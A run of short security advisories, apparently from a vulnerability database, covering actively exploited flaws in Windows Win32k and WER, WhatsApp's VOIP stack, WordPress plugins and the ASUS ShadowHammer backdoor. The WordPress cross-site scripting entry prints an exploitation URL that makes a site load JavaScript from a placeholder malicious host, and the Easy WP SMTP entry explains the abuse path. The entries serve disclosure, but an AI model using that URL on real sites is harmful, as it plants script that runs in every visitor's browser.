The vulnerability exists due to the way Windows Error Reporting (WER) handles files. A local user can create a specially crafted WER file and execute arbitrary code on the system in kernel mode.

Note: this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error within the WhatsApp VOIP stack when processing SRTCP packets. A remote attacker can send a series of specially crafted SRTCP packets sent to a target phone number, trigger buffer overflow and execute arbitrary code on the target device.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Note: this vulnerability is being actively exploited in the wild.

Improper access control

The vulnerability allows a remote attacker to gain unauthorized access to the website.

The vulnerability exists due to improper access restrictions when processing HTTP requests. A remote attacker can pass specially crafted configuration to the affected application and inject arbitrary JavaScript code WordPress configuration.

Successful exploitation of the vulnerability may allow an attacker to compromise vulnerable application.

Note: the vulnerability is being actively exploited i the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note: this vulnerability is being actively exploited in the wild.

Buffer overflow

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error when processing objects in memory within the Microsoft Graphics Win32k component. A local user can create a malicious application, launch it on the system and execute arbitrary code with SYSTEM privileges.

Note: this vulnerability is being actively exploited in the wild.

Hidden functionality (backdoor)

The vulnerability allows a remote attacker to compromise vulnerable system

The vulnerability exists due to hidden functionality (backdoor) is present in software. A remote attacker can use this functionality to gain full access to the application and compromise the affected system.

Note: this backdoor was implented as a result of ASUS servers compromise within the APT attack dubbed “Operation ShadowHammer”. The campaign ran from June to at least November 2018.

Cross-site scripting

The vulnerability allows a remote attacker to perform cross-site scripting attacks.

The vulnerability exists due to usage of the eval() JavaScript call on data passed via the  "swp_url" HTTP GET parameter to "/wp-admin/admin-post.php" script, when "swp_debug" is set to "load_options", allowing to permanently inject and execute arbitrary JavaScript code on the website. A remote unauthenticated attacker can store a specially crafted JavaScript code into database and execute it in browser of every website visitor.

Note: this vulnerability is being actively exploited in the wild.

Exploitation example:

http://[host]/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[malicious_js_script]/

Deserialization of Untrusted Data

The vulnerability allows a remote attacker to compromise vulnerable website.

The vulnerability exists due to insecure input validation when processing serialized data passed via the "swpsmtp_import_settings" HTTP POST parameter to /easy-wp-smtp.php script. A remote unauthenticated attacker can import arbitrary wp_options and reconfigure WordPress to allow user registration with administrative privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable website.

Note: this vulnerability is being actively exploited in the wild.

Memory corruption

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a boundary error within the Win32k.sys driver. A local user can execute a specially crafted application, trigger memory corruption and execute arbitrary code on the target system with elevated privileges.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.